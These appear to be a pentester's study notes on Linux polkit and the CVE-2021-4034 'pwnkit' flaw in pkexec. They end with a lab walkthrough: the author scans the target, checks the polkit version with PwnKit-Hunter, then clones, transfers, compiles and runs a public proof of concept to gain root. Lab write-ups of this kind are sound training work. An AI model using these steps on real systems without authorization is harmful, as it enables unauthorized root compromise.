# Intro - `polkit` is an authorization service for Linux that allows user software and system components to communicate with each other if the user software is authorized to do so - To check whether the user software is authorized for a specified instruction, `polkit` is queried - With `polkit`, it is possible to set how perms are granted by default for each user and app - `polkit` works with two groups of files: 1. actions/policies (`/usr/share/polkit-1/actions`) 2. rules (`/usr/share/polkit-1/rules.d`) - `polkit` also has `local authority` rules which can be used to set or remove additional perms for users and groups - Custom rules can be placed in the directory `/etc/polkit-1/localauthority/50-local.d` with the file extension `.pkla` - `polkit` also comes with three additional programs: - `pkexec` - runs a program with the rights of another user or with root rights - `pkaction` - can be used to display actions - `pkcheck` - this can be used to check if a process is authorized for a specific action #  CVE-2021-4034 - `pkexec` exploit aka `pwnkit` - Of the additional programs associated with `polkit`, `pkexec` is the most interesting as a pentester because it works like `sudo` - `pkexec` syntax ```bash pkexec -u <target_user> <command> #for example plexec -u root id ``` -  [CVE-2021-4034](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034) (aka `pwnkit`) is a memory corruption vuln associated with `pkexec` - [GitHub - cyberark/PwnKit-Hunter: PwnKit-Hunter is here to help you check if your systems are vulnerable to CVE-2021-4043, a.k.a. PwnKit](https://github.com/cyberark/PwnKit-Hunter) can be used to enum `polkit` for `pwnkit` vuln - Once we confirm the vulnerability, we can use this [PoC](https://github.com/arthepsy/CVE-2021-4034) to exploit the `pwnkit` vuln ```bash git clone https://github.com/arthepsy/CVE-2021-4034.git cd CVE-2021-4034 gcc cve-2021-4034-poc.c -o poc ``` - After compiling the exploit, we can execute it and, optionally, change from the standard shell (`sh`) to Bash (`bash`) before proceeeding ```bash ./poc ``` --- # Exercise ## initial enum - `ping` test ![[images/Pasted image 20260214143613.png]] - `nmap`scans ![[images/Pasted image 20260214143825.png]] - `ssh` into target with given creds - light internal enum ![[images/Pasted image 20260214143950.png]] ## `pwnkit` enum - use [GitHub - cyberark/PwnKit-Hunter: PwnKit-Hunter is here to help you check if your systems are vulnerable to CVE-2021-4043, a.k.a. PwnKit](https://github.com/cyberark/PwnKit-Hunter) to enum for `pwnkit` vuln - `git clone` on Kali ![[images/Pasted image 20260214144314.png]] - move to target ![[images/Pasted image 20260214144325.png]] - make executable and run ![[images/Pasted image 20260214144333.png]] - the version of `polkit` on the target is vulnerable to `CVE-2021-4034` ## `pwnkit` exploit - `sudo git clone https://github.com/arthepsy/CVE-2021-4034.git` on Kali ![[images/Pasted image 20260214144635.png]] - there's a `glibc` version mismatch between Kali and target ![[images/Pasted image 20260214144741.png]] - since the target has `gcc`, let's compile on target to avoid errors - serve the `.c` from Kali ![[images/Pasted image 20260214144846.png]] - `wget` from target ![[images/Pasted image 20260214144852.png]] - now compile > successful ![[images/Pasted image 20260214144925.png]] - execute `poc` > we're root! ![[images/Pasted image 20260214145010.png]]